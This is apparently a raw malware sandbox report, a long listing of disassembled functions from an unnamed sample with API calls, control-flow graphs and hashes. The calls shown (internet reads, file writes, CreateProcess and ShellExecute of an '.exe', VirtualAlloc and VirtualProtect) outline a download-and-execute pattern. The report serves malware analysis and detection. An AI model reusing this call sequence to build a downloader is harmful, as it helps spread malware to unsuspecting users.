                                                • Instruction ID: 028426c1fa3081d0d28a70eaa3d0da4b1e0b558b2b709878370dc2549d702951
                                                • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                • Instruction Fuzzy Hash: 3D526A74A01229DFDB64CF59C984BACBBB1BF09304F1480D9E94EAB351DB34AA85DF14
                                                Function 10001175 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 264networkcomfileCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2542 10001175-100011a6 call 1000e8e7 2545 100011a8-100011bd call 1000270d 2542->2545 2546 100011bf 2542->2546 2548 100011c5-100011dd InternetSetFilePointer 2545->2548 2546->2548 2550 100011e3-1000121b InternetReadFile 2548->2550 2551 10001253-1000125a 2550->2551 2552 1000121d-1000124d call 1000270d call 100050e0 call 10002724 2550->2552 2553 10001260-100012a0 call 10003c40 HttpQueryInfoA 2551->2553 2554 1000125c-1000125e 2551->2554 2552->2551 2561 100012a6-100012d2 CoCreateInstance 2553->2561 2562 1000150a-10001520 call 1000e8a5 2553->2562 2554->2550 2554->2553 2561->2562 2564 100012d8-100012df 2561->2564 2564->2562 2567 100012e5-10001316 call 1000184b call 10001006 2564->2567 2573 10001318 2567->2573 2574 1000131a-10001351 call 10001c08 call 10001bb9 2567->2574 2573->2574 2580 10001357-1000135e 2574->2580 2581 100014fe-10001505 2574->2581 2580->2581 2582 10001364-100013cc call 1000270d 2580->2582 2581->2562 2586 100013d2-100013e8 2582->2586 2587 100014e6-100014f9 call 10002724 2582->2587 2589 10001486-10001497 2586->2589 2590 100013ee-1000141d call 1000270d 2586->2590 2587->2581 2592 10001499-1000149b 2589->2592 2593 100014dc-100014e4 2589->2593 2598 1000146e-10001483 call 10002724 2590->2598 2599 1000141f-10001421 2590->2599 2596 100014aa-100014ac 2592->2596 2597 1000149d-100014a8 call 10005926 2592->2597 2593->2587 2601 100014c0-100014d1 call 10003c40 call 10005926 2596->2601 2602 100014ae-100014be call 100050e0 2596->2602 2613 100014d7 call 1000584c 2597->2613 2598->2589 2604 10001423-10001425 2599->2604 2605 10001434-10001447 call 10003c40 2599->2605 2601->2613 2602->2593 2604->2605 2610 10001427-10001432 call 100050e0 2604->2610 2621 10001456-1000145c 2605->2621 2622 10001449-10001454 call 10005926 2605->2622 2610->2598 2613->2593 2621->2598 2624 1000145e-10001463 call 10005926 2621->2624 2628 10001469 call 1000584c 2622->2628 2624->2628 2628->2598
                                                APIs
                                                • __EH_prolog3_GS.LIBCMT ref: 1000117F
                                                • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 100011DD
                                                • InternetReadFile.WININET(?,?,000003E8,?), ref: 100011FB
                                                • HttpQueryInfoA.WININET(?,0000001D,?,00000103,00000000), ref: 10001298
                                                • CoCreateInstance.OLE32(?,00000000,00000001,100111B0,?), ref: 100012CA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID: FileInternet$CreateH_prolog3_HttpInfoInstancePointerQueryRead
                                                • String ID: text
                                                • API String ID: 1154000607-999008199
                                                • Opcode ID: a1e379d679c24b6df6bb2eefa12ec4263e14a704e2d288e5f5fa36855e8b81ad
                                                • Instruction ID: b002d723a568eb8b1b2c33cfea8b8604ab2d7fe63d6740fb25dc42610badb9b0
                                                • Opcode Fuzzy Hash: a1e379d679c24b6df6bb2eefa12ec4263e14a704e2d288e5f5fa36855e8b81ad
                                                • Instruction Fuzzy Hash: 62B14975900229AFEB65CF24CC85BDAB7B8FF09355F1041D9E508A7265DB70AE80CF90
                                                Function 00405A30 Relevance: 8.2, APIs: 2, Strings: 3, Instructions: 678sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004107E2: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A7F,00000000,024FEF0D), ref: 004107F7
                                                  • Part of subcall function 004107E2: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410816
                                                • Sleep.KERNEL32(000005DC), ref: 00405A90
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: Time$FileSleepSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: SUB=$get$U%
                                                • API String ID: 2563648476-1840017472
                                                • Opcode ID: 167d1afffcf2c6992d5677df203f6ddfa97db10191ac7580195699f566a7dfe0
                                                • Instruction ID: c38411781881cdafda6c84006562c20812e5f10be50bcbbeaff71a156a434d29
                                                • Opcode Fuzzy Hash: 167d1afffcf2c6992d5677df203f6ddfa97db10191ac7580195699f566a7dfe0
                                                • Instruction Fuzzy Hash: 04323171D101089BCB19FBB5C95AADE73786F14308F50817FE856771C2EE7C6A08CAA9
                                                Function 10001F20 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 182processCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 10005956: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,10001F48,00000000), ref: 10005969
                                                  • Part of subcall function 10005956: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1000599A
                                                • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 1000212B
                                                • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,0000000A), ref: 10002155
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID: Time$CreateExecuteFileProcessShellSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: .exe$open
                                                • API String ID: 1627157292-49952409
                                                • Opcode ID: e7d307bd9b08359f9d4fa667b823f6c82abf28f5e9ce0c80c34beec9c79a4aa9
                                                • Instruction ID: 97952a91a625a221cb26b3956644a393a6e3da00256d77b8c5daa8cab0653b15
                                                • Opcode Fuzzy Hash: e7d307bd9b08359f9d4fa667b823f6c82abf28f5e9ce0c80c34beec9c79a4aa9
                                                • Instruction Fuzzy Hash: 40514B715083809BE724DF64C881EDFB7E8FB95394F004A2EF69986195DB70A944CB62
                                                Function 00401E20 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 3520 401e20-401e6e 3521 401e70-401e75 3520->3521 3521->3521 3522 401e77-402149 call 402730 * 2 call 40afb0 call 40d0b0 InternetOpenA 3521->3522 3535 402173-402190 call 4099d7 3522->3535 3536 40214b-402157 3522->3536 3537 402169-402170 call 409b3c 3536->3537 3538 402159-402167 3536->3538 3537->3535 3538->3537 3540 402198-4021c9 call 40cfaf call 401e20 3538->3540
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: http://
                                                • API String ID: 0-1121587658
                                                • Opcode ID: 9432e62186f2f9598efc4e2b603940abe351034223c82a34c2a9509acc0423bb
                                                • Instruction ID: 09126ff878240097ddd60f0c8300d9112e53121ff3c2cf1df5c9ef382bee38eb
                                                • Opcode Fuzzy Hash: 9432e62186f2f9598efc4e2b603940abe351034223c82a34c2a9509acc0423bb
                                                • Instruction Fuzzy Hash: 1A518E71E002099FDF14CFA9C895BEEB7B9EB08304F10812EE915BB6C1C779A944CB94
                                                Function 009B17A7 Relevance: 4.6, APIs: 3, Instructions: 99registryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 3549 9b17a7-9b3636 3552 9b3638-9b3653 RegOpenKeyA 3549->3552 3553 9b365f-9b367a RegOpenKeyA 3549->3553 3552->3553 3554 9b3655 3552->3554 3555 9b367c-9b3686 3553->3555 3556 9b3692-9b36be 3553->3556 3554->3553 3555->3556 3559 9b36cb-9b36d5 3556->3559 3560 9b36c0-9b36c9 GetNativeSystemInfo 3556->3560 3561 9b36e1-9b36ef 3559->3561 3562 9b36d7 3559->3562 3560->3559 3564 9b36fb-9b3702 3561->3564 3565 9b36f1 3561->3565 3562->3561 3566 9b3708-9b370f 3564->3566 3567 9b3715 3564->3567 3565->3564 3566->3567 3568 9b4b14-9b4b1b 3566->3568 3569 9b54b9-9b5528 3568->3569 3570 9b4b21-9b4b27 3568->3570 3570->3569
                                                APIs
                                                • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 009B364B
                                                • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 009B3672
                                                • GetNativeSystemInfo.KERNEL32(?), ref: 009B36C9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877232140.00000000009AE000.00000040.00000001.01000000.00000003.sdmp, Offset: 009AE000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_9ae000_file.jbxd
                                                Similarity
                                                • API ID: Open$InfoNativeSystem
                                                • String ID:
                                                • API String ID: 1247124224-0
                                                • Opcode ID: 8b6765ee5b148295bd6b7fdc7c76ab0e347212f1dffaea525dd71995e5d4ed4c
                                                • Instruction ID: 34596642439b3a6b247729d73a1ab005ad5b06c0b8d848a55199c87974dd469c
                                                • Opcode Fuzzy Hash: 8b6765ee5b148295bd6b7fdc7c76ab0e347212f1dffaea525dd71995e5d4ed4c
                                                • Instruction Fuzzy Hash: BB419FB100420FDBDB11EF60CA497EE37A8EF05324F104525D981C6952E6B98DA5CF59
                                                Function 009B360A Relevance: 4.6, APIs: 3, Instructions: 62registryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 3575 9b360a-9b3636 3577 9b3638-9b3653 RegOpenKeyA 3575->3577 3578 9b365f-9b367a RegOpenKeyA 3575->3578 3577->3578 3579 9b3655 3577->3579 3580 9b367c-9b3686 3578->3580 3581 9b3692-9b36be 3578->3581 3579->3578 3580->3581 3584 9b36cb-9b36d5 3581->3584 3585 9b36c0-9b36c9 GetNativeSystemInfo 3581->3585 3586 9b36e1-9b36ef 3584->3586 3587 9b36d7 3584->3587 3585->3584 3589 9b36fb-9b3702 3586->3589 3590 9b36f1 3586->3590 3587->3586 3591 9b3708-9b370f 3589->3591 3592 9b3715 3589->3592 3590->3589 3591->3592 3593 9b4b14-9b4b1b 3591->3593 3594 9b54b9-9b5528 3593->3594 3595 9b4b21-9b4b27 3593->3595 3595->3594
                                                APIs
                                                • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 009B364B
                                                • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 009B3672
                                                • GetNativeSystemInfo.KERNEL32(?), ref: 009B36C9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877232140.00000000009AE000.00000040.00000001.01000000.00000003.sdmp, Offset: 009AE000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_9ae000_file.jbxd
                                                Similarity
                                                • API ID: Open$InfoNativeSystem
                                                • String ID:
                                                • API String ID: 1247124224-0
                                                • Opcode ID: f654361306d3baa665c2dccf2fc8aeed625d44335d180f470f45fc91e7850630
                                                • Instruction ID: 78e94093ff10a425129cba62758ae7f2e3e4a7d173d19cbf3e75fc5e8e84d922
                                                • Opcode Fuzzy Hash: f654361306d3baa665c2dccf2fc8aeed625d44335d180f470f45fc91e7850630
                                                • Instruction Fuzzy Hash: AB21287100014FDEEB12DF60CA49BDE3BA9EF06325F208125D881C6912E7764DA5CF18
                                                Function 004021F0 Relevance: 4.6, APIs: 3, Instructions: 53fileCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 3600 4021f0-40220b 3601 40226b-40227c call 4099d7 3600->3601 3602 40220d-402211 3600->3602 3602->3601 3603 402213-402231 CreateFileA 3602->3603 3603->3601 3605 402233-402260 WriteFile CloseHandle call 4099d7 3603->3605 3608 402265-402268 3605->3608
                                                APIs
                                                • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00402226
                                                • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402247
                                                • CloseHandle.KERNEL32(00000000), ref: 0040224E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: File$CloseCreateHandleWrite
                                                • String ID:
                                                • API String ID: 1065093856-0
                                                • Opcode ID: d9729f344c6c322aed8993abd69ccd2b034d96b2116c2c448128c12d9a7231e9
                                                • Instruction ID: 5700bef43f604e24781938fdb315806f7bd82b17c931dadbe0ad0f8cbe635642
                                                • Opcode Fuzzy Hash: d9729f344c6c322aed8993abd69ccd2b034d96b2116c2c448128c12d9a7231e9
                                                • Instruction Fuzzy Hash: 2B01D272600208ABDB20DBA8DD49FAEB7E8EB48714F40417EFA05A62D0CBB46945C758
                                                Function 00410536 Relevance: 4.5, APIs: 3, Instructions: 15COMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 3609 410536-410542 call 410567 3612 410554-410560 call 410580 ExitProcess 3609->3612 3613 410544-41054e GetCurrentProcess TerminateProcess 3609->3613 3613->3612
                                                APIs
                                                • GetCurrentProcess.KERNEL32(08758BC2,?,00410530,00000016,0040CDA2,?,08758BC2,024FEF0D,0040CDA2,08758BC2), ref: 00410547
                                                • TerminateProcess.KERNEL32(00000000,?,00410530,00000016,0040CDA2,?,08758BC2,024FEF0D,0040CDA2,08758BC2), ref: 0041054E
                                                • ExitProcess.KERNEL32 ref: 00410560
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: Process$CurrentExitTerminate
                                                • String ID:
                                                • API String ID: 1703294689-0
                                                • Opcode ID: 51baef39f8712e3c962c42c17cb56c32fa66d4279d62b7c7599e975f33ebcb9d
                                                • Instruction ID: 67797f44d9d46dd495823d9566bad27c4dc507fd550e6630b3786a266b8fea83
                                                • Opcode Fuzzy Hash: 51baef39f8712e3c962c42c17cb56c32fa66d4279d62b7c7599e975f33ebcb9d
                                                • Instruction Fuzzy Hash: A0D09E31000108FBCF11AF61DC0D8CD3F26AF40355B008035BD0945131DFB59DD69E48
                                                Function 004132B1 Relevance: 3.0, APIs: 2, Instructions: 22memoryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • RtlFreeHeap.NTDLL(00000000,00000000,?,00418A2B,00000000,00000000,00000000,?,00418A50,00000000,00000007,00000000,?,00418D2F,00000000,00000000), ref: 004132C7
                                                • GetLastError.KERNEL32(00000000,?,00418A2B,00000000,00000000,00000000,?,00418A50,00000000,00000007,00000000,?,00418D2F,00000000,00000000), ref: 004132D2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 485612231-0
                                                • Opcode ID: 57565e6569af0ee8b6bc535b15a06f29f01c2303c5bd8ca1e852723f0256f5c9
                                                • Instruction ID: d8d9c1c0f29fd1ae3c391d4f931883298020c9469a54bb124b4f82b2896bf902
                                                • Opcode Fuzzy Hash: 57565e6569af0ee8b6bc535b15a06f29f01c2303c5bd8ca1e852723f0256f5c9
                                                • Instruction Fuzzy Hash: E6E0E6356002146BCB113FB5AC097D57F68AB44759F114076F60C96161D6398996879C
                                                Function 04B60E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetErrorMode.KERNEL32(00000400,?,?,04B60223,?,?), ref: 04B60E19
                                                • SetErrorMode.KERNEL32(00000000,?,?,04B60223,?,?), ref: 04B60E1E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4b60000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorMode
                                                • String ID:
                                                • API String ID: 2340568224-0
                                                • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                • Instruction ID: a9533732da9d409a3fb09f18c49f1467be2f2023480b02c0cc13f7ac882dbf18
                                                • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                • Instruction Fuzzy Hash: 55D0123154512877D7003A95DC09BCD7B1CDF09B62F008451FB0DD9080C774954046E5
                                                Function 00413C79 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RtlAllocateHeap.NTDLL(00000000,00402809,00402805,?,0040AD1B,0040280B,00402805,0042D884,?,?,00403597,?,00402809,00402805), ref: 00413CAB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: 0317c977ae3de03b4a355117f1d18651feb64bc701aa808cd4791dde922aff94
                                                • Instruction ID: d9d624181c4160d02ab49c773ca7be82655902724fa9057d6622eb650e71da69
                                                • Opcode Fuzzy Hash: 0317c977ae3de03b4a355117f1d18651feb64bc701aa808cd4791dde922aff94
                                                • Instruction Fuzzy Hash: BAE0E53350013057D6213F668C007DB7A4C9F413A2F180167EC18B62D0FA6CCE8141ED
                                                Function 100079EE Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • RtlAllocateHeap.NTDLL(00000000,10001F83,?,?,10002743,10001F83,?,10001F83,0007A120), ref: 10007A20
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: e19d539462f031469c69ea45d1cad77acc71583726438384a09bba2e4039781a
                                                • Instruction ID: 0f7b013f9e5e8caa32c185eac4a395cd376aa25861a87a311eefda30a96e0e36
                                                • Opcode Fuzzy Hash: e19d539462f031469c69ea45d1cad77acc71583726438384a09bba2e4039781a
                                                • Instruction Fuzzy Hash: 2FE0A035B0012266F711EA698C00B8F3A89FB832F0F124120AC489209ADA68DE0181E2
                                                Function 009B2861 Relevance: 1.5, APIs: 1, Instructions: 19libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877232140.00000000009AE000.00000040.00000001.01000000.00000003.sdmp, Offset: 009AE000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_9ae000_file.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: 592404ffb6bdf77800cdf739a80689e9c7e9798cbc47049e7dc8e4eb270d7578
                                                • Instruction ID: bb2d368ff64e4f92e202ab0d622f434293cdef87a23e843ef5bcb5694aa9417a
                                                • Opcode Fuzzy Hash: 592404ffb6bdf77800cdf739a80689e9c7e9798cbc47049e7dc8e4eb270d7578
                                                • Instruction Fuzzy Hash: 98E092B1008B15DFC3143F6AE1945A9FFF8EF44360F52482DE1C986240D23504C1DB17
                                                Function 10005BF4 Relevance: 1.5, APIs: 1, Instructions: 11COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • _free.LIBCMT ref: 10005C07
                                                  • Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
                                                  • Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID: ErrorFreeHeapLast_free
                                                • String ID:
                                                • API String ID: 1353095263-0
                                                • Opcode ID: d102fdbbc19008656020672b0513dbd0600b00c460041e1c03a0ef10da910664
                                                • Instruction ID: c87f8b0a48b83a8a7248450826a19003e4aa18d6d81e39a7cffe4d34c565a0dd
                                                • Opcode Fuzzy Hash: d102fdbbc19008656020672b0513dbd0600b00c460041e1c03a0ef10da910664
                                                • Instruction Fuzzy Hash: D9C04C75500208BBDB05DF45DD06A4E7BA9EB812A4F204054F41567291DAB5EF449691
                                                Function 00AAD4AB Relevance: 1.5, APIs: 1, Instructions: 8memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualProtect.KERNEL32(?), ref: 00AAD4B1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877232140.0000000000AAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AAC000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aac000_file.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: 840489e7676759e8cb3284605378cebeb5077e9a9fbd00e61d84db228f84a02c
                                                • Instruction ID: 3478b198c5479c43dba618617aec86a0a29305fd9e04ed11fa9ec6874035a9f6
                                                • Opcode Fuzzy Hash: 840489e7676759e8cb3284605378cebeb5077e9a9fbd00e61d84db228f84a02c
                                                • Instruction Fuzzy Hash: 42C0222000E3E823C3232F300CE8B8EBF000F0B200F080C88E2CA0A8C3CAC02C00C32A
                                                Function 00F6CDC5 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 00F6CE16
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2878196099.0000000000F6C000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F6C000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f6c000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                • Instruction ID: 3f3e4586b33f5298a25c903518db37b8ba12b8023771e18266d653722ed3c811
                                                • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                • Instruction Fuzzy Hash: A5113F79A00208EFDB01DF98C985E99BBF5AF08750F058094F9889B361D375EA50EF80
                                                Function 00402E30 Relevance: 1.3, APIs: 1, Instructions: 9memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualAlloc.KERNEL32(?,?,?,?), ref: 00402E3F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 9b7f6f3ca0983af9e8fdb80d9d56c3a0869d2f15b64f49a49faae6a606d2425e
                                                • Instruction ID: eb79ea19b3e1abf3f5b24c483eecae43203cd8e5c5511bfeef65b24117358006
                                                • Opcode Fuzzy Hash: 9b7f6f3ca0983af9e8fdb80d9d56c3a0869d2f15b64f49a49faae6a606d2425e
                                                • Instruction Fuzzy Hash: 17C0483200020DFBCF025FD1EC048DA7F2AFB09260B00C020FA1844032C773A931ABA5
                                                Function 00402E50 Relevance: 1.3, APIs: 1, Instructions: 8COMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualFree.KERNELBASE(?,?,?), ref: 00402E5C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: FreeVirtual
                                                • String ID:
                                                • API String ID: 1263568516-0
                                                • Opcode ID: c340e0d22e4fb20872e2675f8e927c09d9f86923da33760a30bf271b1d9be8d1
                                                • Instruction ID: a3fa6bbe5c1a250ebea8c2fc35f655263c95a0ace9f7750fc45cf9fcc5ecde2d
                                                • Opcode Fuzzy Hash: c340e0d22e4fb20872e2675f8e927c09d9f86923da33760a30bf271b1d9be8d1
                                                • Instruction Fuzzy Hash: 5CB0923204020CFBCF025F81EC048D93F6AFB0C261B408020FA1C44031C7339675AB84

                                                Non-executed Functions

                                                Function 04B63F87 Relevance: 43.8, APIs: 20, Strings: 4, Instructions: 1839sleepcomCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetTempPathA.KERNEL32(00000104,?,0042C014,0041F068,00000000), ref: 04B63FF1
                                                • Sleep.KERNEL32(000003E8), ref: 04B64189
                                                • __Init_thread_footer.LIBCMT ref: 04B6475E
                                                • __Init_thread_footer.LIBCMT ref: 04B64924
                                                • SHGetFolderPathA.SHELL32(00000000,00000000,00000000,00000000,?,00000000,?,04B66D08,0041D805,0042DA9C,0042DA9D,?,00000000,00000000,0042DC1C,0042DC1D), ref: 04B64B2E
                                                • __Init_thread_footer.LIBCMT ref: 04B64BBC
                                                • __Init_thread_footer.LIBCMT ref: 04B64E25
                                                • CoInitialize.OLE32(00000000), ref: 04B64EA6
                                                • CoCreateInstance.COMBASE(0041F290,00000000,00000001,0041F260,?), ref: 04B64EC1
                                                • __Init_thread_footer.LIBCMT ref: 04B65324
                                                • Sleep.KERNEL32(00000BB8,00000000,?,04B66CE8,0041D8A0,0042DB20,0042DB21), ref: 04B6553C
                                                • __Init_thread_footer.LIBCMT ref: 04B65632
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104,?,04B66D08,0041D805,0042DA9C,0042DA9D,?,00000000,00000000,0042DC1C,0042DC1D), ref: 04B64F2F
                                                  • Part of subcall function 04B70A49: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,04B65CE6,00000000,0042C014), ref: 04B70A5E
                                                  • Part of subcall function 04B70A49: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04B70A7D
                                                • __Init_thread_footer.LIBCMT ref: 04B6428D
                                                  • Part of subcall function 04B69EA2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04B69EAC
                                                  • Part of subcall function 04B69EA2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04B69EDF
